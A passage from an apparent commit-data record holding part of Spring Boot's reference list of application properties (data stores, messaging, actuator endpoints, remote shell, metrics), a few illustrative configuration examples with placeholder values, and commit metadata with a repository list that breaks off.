0 disables the cache\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.datasource.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\t# DATA REST ({spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[RepositoryRestConfiguration])\n\tspring.data.rest.base-path= # base path against which the exporter should calculate its links\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.*= # Any public property available on the auto-configured `Flyway` object\n\tflyway.check-location=false # check that migration scripts location exists\n\tflyway.locations=classpath:db\/migration # locations of migration scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version=1 # version to start migration\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.check-change-log-location=true # check the change log location exists\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\tspring.jmx.server=mbeanServer # MBeanServer bean name
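# ---- Example (illustrative; not part of the original listing) ----
# A minimal sketch running Flyway against its own JDBC connection rather
# than the application DataSource, using only the flyway.* keys above;
# the URL and credentials are placeholders.
flyway.enabled=true
flyway.locations=classpath:db\/migration
flyway.url=jdbc:mysql:\/\/localhost:3306\/test
flyway.user=flyway
flyway.password=flyway-secret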
\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.dynamic=true # create an AmqpAdmin bean\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.requested-heartbeat= # requested heartbeat timeout, in seconds; zero for none\n\tspring.rabbitmq.ssl.enabled=false # enable SSL support\n\tspring.rabbitmq.ssl.key-store= # path to the key store that holds the SSL certificate\n\tspring.rabbitmq.ssl.key-store-password= # password used to access the key store\n\tspring.rabbitmq.ssl.trust-store= # trust store that holds SSL certificates\n\tspring.rabbitmq.ssl.trust-store-password= # password used to access the trust store\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.virtual-host= # virtual host to use when connecting to the broker\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database= # database name\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\tspring.redis.sentinel.master= # name of Redis server\n\tspring.redis.sentinel.nodes= # comma-separated list of host:port pairs\n\tspring.redis.timeout= # connection timeout in milliseconds\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.mode= # connection mode (native, embedded)\n\tspring.artemis.host=localhost # artemis host (native mode)\n\tspring.artemis.port=5445 # artemis port (native mode)\n\tspring.artemis.embedded.enabled=true # if the embedded server is enabled (needs artemis-jms-server.jar)\n\tspring.artemis.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.artemis.embedded.persistent=false # message persistence\n\tspring.artemis.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.artemis.embedded.queues= # comma-separated queues to create on startup\n\tspring.artemis.embedded.topics= # comma-separated topics to create on startup\n\tspring.artemis.embedded.cluster-password= # cluster password (randomly generated by default)\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # 
comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # cluster password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # JNDI location of a JMS ConnectionFactory\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.host=smtp.acme.org # mail server host\n\tspring.mail.port= # mail server port\n\tspring.mail.username=\n\tspring.mail.password=\n\tspring.mail.default-encoding=UTF-8 # encoding to use for MimeMessages\n\tspring.mail.properties.*= # properties to set on the JavaMail session\n\tspring.mail.jndi-name= # JNDI location of a Mail Session\n\tspring.mail.test-connection=false # Test that the mail server is available on startup\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\tspring.batch.table-prefix= # table prefix for all the batch meta-data tables\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.type= # generic, ehcache, hazelcast, infinispan, jcache, redis, guava, simple, none\n\tspring.cache.cache-names= # cache names to create on startup\n\tspring.cache.ehcache.config= # location of the ehcache configuration\n\tspring.cache.hazelcast.config= # location of the hazelcast configuration\n\tspring.cache.infinispan.config= # location of the infinispan configuration\n\tspring.cache.jcache.config= # location of jcache configuration\n\tspring.cache.jcache.provider= # fully qualified name of the CachingProvider implementation to use\n\tspring.cache.guava.spec= # link:http:\/\/docs.guava-libraries.googlecode.com\/git\/javadoc\/com\/google\/common\/cache\/CacheBuilderSpec.html[guava specs]\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret
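# ---- Example (illustrative; not part of the original listing) ----
# A minimal sketch picking the Guava cache provider explicitly via the
# spring.cache keys above; the cache names and spec string are placeholders.
spring.cache.type=guava
spring.cache.cache-names=users,orders
spring.cache.guava.spec=maximumSize=500,expireAfterAccess=10m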
\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback= # enable support for fallback resolution, defaults to false.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n # DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n spring.devtools.restart.enabled=true # enable automatic restart\n spring.devtools.restart.exclude= # patterns that should be excluded from triggering a full restart\n spring.devtools.restart.poll-interval= # amount of time (in milliseconds) to wait between polling for classpath changes\n spring.devtools.restart.quiet-period= # amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered\n spring.devtools.restart.trigger-file= # name of a specific file that when changed will trigger the restart\n\tspring.devtools.livereload.enabled=true # enable a livereload.com compatible server\n spring.devtools.livereload.port=35729 # server port.\n\n # REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n spring.devtools.remote.context-path=\/.~~spring-boot!~ # context path used to handle the remote connection\n spring.devtools.remote.debug.enabled=true # enable remote debug support\n spring.devtools.remote.debug.local-port=8000 # local remote debug server port\n spring.devtools.remote.restart.enabled=true # enable remote restart\n spring.devtools.remote.secret= # a shared secret required to establish a connection\n spring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # defaults to '\/'\n\tmanagement.add-application-context-header= # defaults to true\n\tmanagement.security.enabled=true # enable security\n\tmanagement.security.role=ADMIN # role required to access the management endpoint\n\tmanagement.security.sessions=stateless # session creating policy to use (always, never, if_required, stateless)\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.file= # Location of the PID file to write\n\tspring.pid.fail-on-write-error= # Fail if the PID file cannot be written
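# ---- Example (illustrative; not part of the original listing) ----
# A minimal sketch moving the actuator onto its own port behind the ADMIN
# role, using only the management.* keys above; the port and context path
# are placeholders.
management.port=8081
management.context-path=\/manage
management.security.enabled=true
management.security.role=ADMIN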
\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.enabled=true # enable all endpoints\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=true\n\tendpoints.health.enabled=true\n\tendpoints.health.mapping.*= # mapping of health statuses to HttpStatus codes\n\tendpoints.health.time-to-live=1000\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.logfile.path=\/logfile\n\tendpoints.logfile.sensitive=true\n\tendpoints.logfile.enabled=true\n\tendpoints.mappings.enabled=true\n\tendpoints.mappings.id=mappings\n\tendpoints.mappings.sensitive=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/MvcEndpointCorsProperties.{sc-ext}[MvcEndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # set whether user credentials are supported. When not set, credentials are not supported.\n\tendpoints.cors.allowed-origins= # comma-separated list of origins to allow. * allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.allowed-methods= # comma-separated list of methods to allow. * allows all methods. When not set, defaults to GET.\n\tendpoints.cors.allowed-headers= # comma-separated list of headers to allow in a request. 
* allows all headers.\n\tendpoints.cors.exposed-headers= # comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # how long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true\n\tmanagement.health.elasticsearch.enabled=true\n\tmanagement.health.elasticsearch.indices= # comma-separated index names\n\tmanagement.health.elasticsearch.response-timeout=100 # the time, in milliseconds, to wait for a response from the cluster\n\tmanagement.health.diskspace.enabled=true\n\tmanagement.health.diskspace.path=.\n\tmanagement.health.diskspace.threshold=10485760\n\tmanagement.health.jms.enabled=true\n\tmanagement.health.mail.enabled=true\n\tmanagement.health.mongo.enabled=true\n\tmanagement.health.rabbit.enabled=true\n\tmanagement.health.redis.enabled=true\n\tmanagement.health.solr.enabled=true\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=\/jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true # enable JMX export of all endpoints\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # comma-separated list of commands to disable\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.enabled=true # flag to disable all metric exports (assuming any MetricWriters are available)\n\tspring.metrics.export.delay-millis=5000 # delay in milliseconds between export ticks\n\tspring.metrics.export.send-latest=true # flag to switch off any available optimizations based on not exporting unchanged metric values\n\tspring.metrics.export.includes= # list of patterns for metric names to include\n\tspring.metrics.export.excludes= # list of patterns for metric names to exclude. 
Applied after the includes\n\tspring.metrics.export.redis.aggregate-key-pattern= # pattern that tells the aggregator what to do with the keys from the source repository\n\tspring.metrics.export.redis.prefix=spring.metrics # prefix for redis repository if active\n\tspring.metrics.export.redis.key=keys.spring.metrics # key for redis repository export (if active)\n\tspring.metrics.export.triggers.*= # specific trigger properties per MetricWriter bean name\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e10dbc2691f40be2908409250e9cd28e21bf886","subject":"Polish documentation","message":"Polish documentation\n\nSome connection pool specific keys were still advertized in the\ndocumentation.\n","repos":"philwebb\/spring-boot-concourse,eddumelendez\/spring-boot,philwebb\/spring-boot,lucassaldanha\/spring-boot,jbovet\/spring-boot,habuma\/spring-boot,chrylis\/spring-boot,joshthornhill\/spring-boot,Buzzardo\/spring-boot,i007422\/jenkins2-course-spring-boot,aahlenst\/spring-boot,jbovet\/spring-boot,Nowheresly\/spring-boot,nebhale\/spring-boot,nebhale\/spring-boot,ilayaperumalg\/spring-boot,thomasdarimont\/spring-boot,jvz\/spring-boot,izeye\/spring-boot,vakninr\/spring-boot,minmay\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,mosoft521\/spring-boot,ihoneymon\/spring-boot,afroje-reshma\/spring-boot-sample,cleverjava\/jenkins2-course-spring-boot,jxblum\/spring-boot,htynkn\/spring-boot,DeezCashews\/spring-boot,isopov\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,ptahchiev\/spring-boot,nebhale\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot-concourse,royclarkson\/spring-boot,xiaoleiPENG\/my-project,linead\/spring-boot,zhanhb\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,lexandro\/spring-boot,eddumelendez\/spring-boot,jvz\/spring-boot,cleverjava\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,shakuzen\/spring-boot,mbogoevici\/spring-boot,tsachev\/spring-boot,olivergierke\/spring-boot,ollie314\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot-concourse,scottfrederick\/spring-boot,qerub\/spring-boot,afroje-reshma\/spring-boot-sample,mbenson\/spring-boot,olivergierke\/spring-boot,spring-projects\/spring-boot,RichardCSantana\/spring-boot,kamilszymanski\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,vakninr\/spring-boot,felipeg48\/spring-boot,drumonii\/spring-boot,candrews\/spring-boot,bclozel\/spring-boot,joshiste\/spring-boot,isopov\/spring-boot,bjornlindstrom\/spring-boot,minmay\/spring-boot,lexandro\/spring-boot,jmnarloch\/spring-boot,NetoDevel\/spring-boot,SaravananParthasarathy\/SPSDemo,ollie314\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,deki\/spring-boot,mbenson\/spring-boot,joshiste\/spring-boot,bjornlindstrom\/spring-boot,ilayaperumalg\/spring-boot,afroje-reshma\/spring-boot-sample,rweisleder\/spring-boot,candrews\/spring-boot,jmnarloch\/spring-boot,shangyi0102\/spring-boot,nebhale\/spring-boot,mbenson\/spring-boot,i007422\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-b
oot,hello2009chen\/spring-boot,philwebb\/spring-boot-concourse,felipeg48\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,shangyi0102\/spring-boot,kamilszymanski\/spring-boot,bclozel\/spring-boot,herau\/spring-boot,chrylis\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,mbogoevici\/spring-boot,tsachev\/spring-boot,kamilszymanski\/spring-boot,shakuzen\/spring-boot,jxblum\/spring-boot,rweisleder\/spring-boot,linead\/spring-boot,Nowheresly\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,javyzheng\/spring-boot,qerub\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,hqrt\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,royclarkson\/spring-boot,mbenson\/spring-boot,Nowheresly\/spring-boot,scottfrederick\/spring-boot,tiarebalbi\/spring-boot,Buzzardo\/spring-boot,thomasdarimont\/spring-boot,lenicliu\/spring-boot,herau\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,habuma\/spring-boot,neo4j-contrib\/spring-boot,hello2009chen\/spring-boot,SaravananParthasarathy\/SPSDemo,tsachev\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,sebastiankirsch\/spring-boot,joshthornhill\/spring-boot,drumonii\/spring-boot,i007422\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,michael-simons\/spring-boot,mosoft521\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,michael-simons\/spring-boot,jmnarloch\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,vpavic\/spring-boot,tsachev\/spring-boot,jvz\/spring-boot,philwebb\/spring-boot,shakuzen\/spring-boot,candrews\/spring-boot,javyzheng\/spring-boot,michael-simons\/spring-boot,shangyi0102\/spring-boot,drumonii\/spring-boot,pvorb\/spring-boot,bijukunjummen\/spring-boot,bbrouwer\/spring-boot,zhanhb\/spring-boot,javyzheng\/spring-boot,kdvolder\/spring-boot,yangdd1205\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,philwebb\/spring-boot-concourse,hello2009chen\/spring-boot,lburgazzoli\/spring-boot,bclozel\/spring-boot,shakuzen\/spring-boot,kdvolder\/spring-boot,deki\/spring-boot,joshthornhill\/spring-boot,chrylis\/spring-boot,habuma\/spring-boot,mbenson\/spring-boot,hqrt\/jenkins2-course-spring-boot,jbovet\/spring-boot,wilkinsona\/spring-boot,kdvolder\/spring-boot,hqrt\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,jmnarloch\/spring-boot,bbrouwer\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,lenicliu\/spring-boot,RichardCSantana\/spring-boot,jxblum\/spring-boot,izeye\/spring-boot,sbcoba\/spring-boot,deki\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,scottfrederick\/spring-boot,RichardCSantana\/spring-boot,olivergierke\/spring-boot,kdvolder\/spring-boot,ihoneymon\/spring-boot,jbovet\/spring-boot,jayarampradhan\/spring-boot,ollie314\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,shakuzen\/spring-boot,wilkinsona\/spring-boot,joshiste\/spring-boot,ilayaperumalg\/spring-boot,eddumelendez\/spring-boot,hello2009chen\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,shangyi0102\/spring-boot,ptahchiev\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,akmaharshi\/jenkins,bclozel\/spring-boot,tsachev\/spring-boot,neo4j-contrib\/spring-boot,royclarkson\/spring-boot,sebastiankirsch\/spring-boot,linead\/spring-boot,shangyi0102\/spring-boot,NetoDevel\/spring-boot,afroje-reshma\/spring-boot-sample,mosoft521\/spring-boot,l
ucassaldanha\/spring-boot,Buzzardo\/spring-boot,isopov\/spring-boot,DeezCashews\/spring-boot,aahlenst\/spring-boot,bjornlindstrom\/spring-boot,qerub\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,sebastiankirsch\/spring-boot,deki\/spring-boot,candrews\/spring-boot,minmay\/spring-boot,dreis2211\/spring-boot,chrylis\/spring-boot,spring-projects\/spring-boot,deki\/spring-boot,kamilszymanski\/spring-boot,bijukunjummen\/spring-boot,donhuvy\/spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,lucassaldanha\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,ptahchiev\/spring-boot,chrylis\/spring-boot,tsachev\/spring-boot,olivergierke\/spring-boot,yangdd1205\/spring-boot,NetoDevel\/spring-boot,DeezCashews\/spring-boot,izeye\/spring-boot,neo4j-contrib\/spring-boot,cleverjava\/jenkins2-course-spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,sbcoba\/spring-boot,bbrouwer\/spring-boot,wilkinsona\/spring-boot,SaravananParthasarathy\/SPSDemo,lenicliu\/spring-boot,neo4j-contrib\/spring-boot,philwebb\/spring-boot,DeezCashews\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,ihoneymon\/spring-boot,brettwooldridge\/spring-boot,kamilszymanski\/spring-boot,cleverjava\/jenkins2-course-spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,linead\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,mosoft521\/spring-boot,habuma\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,akmaharshi\/jenkins,Buzzardo\/spring-boot,ptahchiev\/spring-boot,mbogoevici\/spring-boot,lucassaldanha\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,zhanhb\/spring-boot,pvorb\/spring-boot,tiarebalbi\/spring-boot,zhanhb\/spring-boot,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,pvorb\/spring-boot,qerub\/spring-boot,Nowheresly\/spring-boot,bjornlindstrom\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,ollie314\/spring-boot,jxblum\/spring-boot,pvorb\/spring-boot,wilkinsona\/spring-boot,vakninr\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,zhanhb\/spring-boot,jmnarloch\/spring-boot,RichardCSantana\/spring-boot,tiarebalbi\/spring-boot,mosoft521\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,Buzzardo\/spring-boot,yhj630520\/spring-boot,Buzzardo\/spring-boot,bbrouwer\/spring-boot,herau\/spring-boot,SaravananParthasarathy\/SPSDemo,rweisleder\/spring-boot,akmaharshi\/jenkins,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,bijukunjummen\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,mbogoevici\/spring-boot,minmay\/spring-boot,vpavic\/spring-boot,i007422\/jenkins2-course-spring-boot,dreis2211\/spring-boot,herau\/spring-boot,vpavic\/spring-boot,javyzheng\/spring-boot,spring-projects\/spring-boot,thomasdarimont\/spring-boot,lucassaldanha\/spring-boot,sbcoba\/